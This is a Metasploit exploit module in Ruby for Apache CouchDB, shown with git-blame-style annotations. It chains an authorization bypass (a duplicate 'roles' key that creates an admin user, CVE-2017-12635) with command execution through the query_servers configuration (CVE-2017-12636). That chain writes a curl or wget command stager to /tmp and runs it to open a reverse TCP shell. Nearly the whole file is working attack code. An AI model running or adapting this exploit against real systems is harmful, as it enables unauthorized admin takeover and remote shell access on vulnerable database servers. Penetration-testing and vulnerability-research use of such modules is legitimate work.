2018-03-27 05:43:03 -04:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2018-07-12 00:49:29 -05:00
|
|
|
|
2018-03-27 05:43:03 -04:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2018-04-10 06:14:47 -04:00
|
|
|
include Msf::Exploit::CmdStager
|
2018-07-12 00:49:29 -05:00
|
|
|
include Msf::Exploit::FileDropper
|
2018-03-27 05:43:03 -04:00
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
2018-04-10 06:14:47 -04:00
|
|
|
'Name' => 'Apache CouchDB Arbitrary Command Execution',
|
2018-03-27 05:43:03 -04:00
|
|
|
'Description' => %q{
|
|
|
|
|
CouchDB administrative users can configure the database server via HTTP(S).
|
|
|
|
|
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
|
|
|
|
|
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,
|
|
|
|
|
including downloading and executing scripts from the public internet.
|
|
|
|
|
},
|
2018-07-11 21:40:19 -05:00
|
|
|
'Author' => [
|
2018-07-12 21:58:49 -05:00
|
|
|
'Max Justicz', # CVE-2017-12635 Vulnerability discovery
|
|
|
|
|
'Joan Touzet', # CVE-2017-12636 Vulnerability discovery
|
|
|
|
|
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
2018-03-27 05:43:03 -04:00
|
|
|
],
|
2018-07-11 21:40:19 -05:00
|
|
|
'References' => [
|
|
|
|
|
['CVE', '2017-12636'],
|
|
|
|
|
['CVE', '2017-12635'],
|
|
|
|
|
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
|
|
|
|
|
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
|
|
|
|
|
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
|
2018-03-27 05:43:03 -04:00
|
|
|
],
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2016-04-06',
|
2018-03-27 05:43:03 -04:00
|
|
|
'License' => MSF_LICENSE,
|
2018-04-10 06:14:47 -04:00
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Arch' => [ARCH_X86, ARCH_X64],
|
2018-03-27 05:43:03 -04:00
|
|
|
'Privileged' => false,
|
|
|
|
|
'DefaultOptions' => {
|
2018-07-11 21:40:19 -05:00
|
|
|
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
|
2018-04-10 06:14:47 -04:00
|
|
|
'CMDSTAGER::FLAVOR' => 'curl'
|
2018-07-11 21:40:19 -05:00
|
|
|
},
|
|
|
|
|
'CmdStagerFlavor' => ['curl', 'wget'],
|
|
|
|
|
'Targets' => [
|
2018-07-11 21:46:38 -05:00
|
|
|
['Automatic', {}],
|
|
|
|
|
['Apache CouchDB version 1.x', {}],
|
|
|
|
|
['Apache CouchDB version 2.x', {}]
|
2018-03-27 05:43:03 -04:00
|
|
|
],
|
2018-07-11 21:46:38 -05:00
|
|
|
'DefaultTarget' => 0
|
|
|
|
|
))
|
2018-03-27 05:43:03 -04:00
|
|
|
|
|
|
|
|
register_options([
|
2018-07-11 21:46:38 -05:00
|
|
|
Opt::RPORT(5984),
|
|
|
|
|
OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
|
|
|
|
|
OptString.new('HttpUsername', [false, 'The username to login as']),
|
|
|
|
|
OptString.new('HttpPassword', [false, 'The password to login with'])
|
|
|
|
|
])
|
|
|
|
|
|
|
|
|
|
register_advanced_options([
|
|
|
|
|
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
|
|
|
|
|
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
|
|
|
|
|
])
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
2018-08-09 23:34:03 -05:00
|
|
|
def post_auth?
|
|
|
|
|
true
|
|
|
|
|
end
|
|
|
|
|
|
2018-03-27 05:43:03 -04:00
|
|
|
def check
|
2018-04-09 00:07:58 -04:00
|
|
|
get_version
|
2023-04-07 09:55:00 +09:00
|
|
|
return CheckCode::Unknown if @version.nil?
|
2021-02-17 12:33:59 +00:00
|
|
|
version = Rex::Version.new(@version)
|
2018-04-09 00:07:58 -04:00
|
|
|
return CheckCode::Unknown if version.version.empty?
|
|
|
|
|
vprint_status "Found CouchDB version #{version}"
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2021-02-17 12:33:59 +00:00
|
|
|
return CheckCode::Appears if version < Rex::Version.new('1.7.0') || version.between?(Rex::Version.new('2.0.0'), Rex::Version.new('2.1.0'))
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2018-04-09 00:07:58 -04:00
|
|
|
CheckCode::Safe
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
2018-04-10 06:14:47 -04:00
|
|
|
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
|
2018-04-09 00:07:58 -04:00
|
|
|
version = @version
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2018-04-03 22:47:41 -04:00
|
|
|
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2018-04-10 06:14:47 -04:00
|
|
|
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
|
|
|
|
|
@cmdstager = generate_cmdstager(
|
2018-07-12 00:49:29 -05:00
|
|
|
temp: datastore['WritableDir'],
|
|
|
|
|
file: File.basename(cmdstager_path)
|
2018-04-10 06:14:47 -04:00
|
|
|
).join(';')
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2018-07-12 00:49:29 -05:00
|
|
|
register_file_for_cleanup(cmdstager_path)
|
|
|
|
|
|
2018-04-10 06:14:47 -04:00
|
|
|
if !datastore['Attempts'] || datastore['Attempts'] <= 0
|
2018-04-04 00:08:32 -04:00
|
|
|
attempts = 1
|
|
|
|
|
else
|
|
|
|
|
attempts = datastore['Attempts']
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
attempts.times do |i|
|
2018-07-11 21:40:19 -05:00
|
|
|
print_status("#{peer} - The #{i + 1} time to exploit")
|
2018-03-27 05:43:03 -04:00
|
|
|
send_payload(version)
|
2018-04-04 00:08:32 -04:00
|
|
|
Rex.sleep(5)
|
2018-03-27 05:43:03 -04:00
|
|
|
# break if we get the shell
|
2018-07-12 00:49:29 -05:00
|
|
|
break if session_created?
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# CVE-2017-12635
|
|
|
|
|
# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
|
|
|
|
|
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
|
|
|
|
|
# for the newly created user.
|
|
|
|
|
def auth_bypass
|
2018-04-08 23:38:44 -04:00
|
|
|
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
|
2018-03-27 05:43:03 -04:00
|
|
|
@auth = basic_auth(username, password)
|
|
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'ctype' => 'application/json',
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-12 00:49:29 -05:00
|
|
|
if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']
|
2018-03-27 05:43:03 -04:00
|
|
|
return true
|
|
|
|
|
else
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
2018-04-09 00:07:58 -04:00
|
|
|
def get_version
|
|
|
|
|
@version = nil
|
2018-03-27 05:43:03 -04:00
|
|
|
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi(
|
2018-07-11 21:40:19 -05:00
|
|
|
'uri' => normalize_uri(target_uri.path),
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'authorization' => @auth
|
|
|
|
|
)
|
2018-07-12 00:49:29 -05:00
|
|
|
rescue Rex::ConnectionError
|
2018-04-08 07:51:37 -04:00
|
|
|
vprint_bad("#{peer} - Connection failed")
|
2018-04-09 00:07:58 -04:00
|
|
|
return false
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
unless res
|
2018-04-08 07:51:37 -04:00
|
|
|
vprint_bad("#{peer} - No response, check if it is CouchDB. ")
|
2018-04-09 00:07:58 -04:00
|
|
|
return false
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if res && res.code == 401
|
|
|
|
|
print_bad("#{peer} - Authentication required.")
|
2018-04-09 00:07:58 -04:00
|
|
|
return false
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if res && res.code == 200
|
2018-04-10 06:14:47 -04:00
|
|
|
res_json = res.get_json_document
|
|
|
|
|
|
|
|
|
|
if res_json.empty?
|
|
|
|
|
vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
|
2018-04-09 00:07:58 -04:00
|
|
|
@version = res_json['version'] if res_json['version']
|
|
|
|
|
return true
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
2018-04-08 07:51:37 -04:00
|
|
|
vprint_warning("#{peer} - Version not found")
|
2018-04-09 00:07:58 -04:00
|
|
|
return true
|
2018-03-27 05:43:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def send_payload(version)
|
2018-04-10 06:14:47 -04:00
|
|
|
vprint_status("#{peer} - CouchDB version is #{version}") if version
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2021-02-17 12:33:59 +00:00
|
|
|
version = Rex::Version.new(@version)
|
2018-07-11 21:40:19 -05:00
|
|
|
if version.version.empty?
|
2018-04-10 06:14:47 -04:00
|
|
|
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
|
|
|
|
|
# if target set Automatic, exploit failed.
|
|
|
|
|
if target == targets[0]
|
|
|
|
|
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
|
|
|
|
|
elsif target == targets[1]
|
|
|
|
|
payload1
|
|
|
|
|
elsif target == targets[2]
|
|
|
|
|
payload2
|
|
|
|
|
end
|
2021-02-17 12:33:59 +00:00
|
|
|
elsif version < Rex::Version.new('1.7.0')
|
2018-03-27 05:43:03 -04:00
|
|
|
payload1
|
2021-02-17 12:33:59 +00:00
|
|
|
elsif version.between?(Rex::Version.new('2.0.0'), Rex::Version.new('2.1.0'))
|
2018-03-27 05:43:03 -04:00
|
|
|
payload2
|
2021-02-17 12:33:59 +00:00
|
|
|
elsif version >= Rex::Version.new('1.7.0') || Rex::Version.new('2.1.0')
|
2018-03-27 05:43:03 -04:00
|
|
|
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Exploit with multi requests
|
|
|
|
|
# payload1 is for the version of couchdb below 1.7.0
|
|
|
|
|
def payload1
|
2018-04-08 23:38:44 -04:00
|
|
|
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
|
2018-03-27 05:43:03 -04:00
|
|
|
rand_hex = Rex::Text.rand_text_hex(32)
|
2018-04-10 06:14:47 -04:00
|
|
|
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
|
2018-07-12 00:49:29 -05:00
|
|
|
|
|
|
|
|
register_file_for_cleanup(rand_file)
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth
|
|
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"_id": "#{rand_hex}"})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
|
|
|
|
|
'method' => 'POST',
|
|
|
|
|
'authorization' => @auth,
|
|
|
|
|
'ctype' => 'application/json',
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"language":"#{rand_cmd1}","map":""})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %("/bin/sh #{rand_file}")
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
|
|
|
|
|
'method' => 'POST',
|
|
|
|
|
'authorization' => @auth,
|
|
|
|
|
'ctype' => 'application/json',
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"language":"#{rand_cmd2}","map":""})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# payload2 is for the version of couchdb below 2.1.1
|
|
|
|
|
def payload2
|
2018-04-08 23:38:44 -04:00
|
|
|
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
|
|
|
|
|
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
|
2018-03-27 05:43:03 -04:00
|
|
|
rand_hex = Rex::Text.rand_text_hex(32)
|
2018-04-10 06:14:47 -04:00
|
|
|
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
|
2018-03-27 05:43:03 -04:00
|
|
|
|
2018-07-12 00:49:29 -05:00
|
|
|
register_file_for_cleanup(rand_file)
|
2018-03-27 05:43:03 -04:00
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
'uri' => normalize_uri(target_uri.path, "/_membership"),
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'authorization' => @auth
|
|
|
|
|
)
|
2018-07-12 00:49:29 -05:00
|
|
|
|
2018-03-27 05:43:03 -04:00
|
|
|
node = res.get_json_document['all_nodes'][0]
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth
|
|
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"_id": "#{rand_hex}"})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
|
|
|
|
'ctype' => 'application/json',
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %("/bin/sh #{rand_file}")
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
|
2018-07-11 22:49:13 -05:00
|
|
|
send_request_cgi(
|
2018-03-27 05:43:03 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
|
|
|
|
|
'method' => 'PUT',
|
|
|
|
|
'authorization' => @auth,
|
|
|
|
|
'ctype' => 'application/json',
|
2018-07-11 21:40:19 -05:00
|
|
|
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
|
2018-03-27 05:43:03 -04:00
|
|
|
)
|
|
|
|
|
end
|
|
|
|
|
|
2018-04-10 06:14:47 -04:00
|
|
|
def cmdstager_path
|
|
|
|
|
@cmdstager_path ||=
|
|
|
|
|
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
|
|
|
|
|
end
|
2018-03-27 05:43:03 -04:00
|
|
|
|
|
|
|
|
end
|
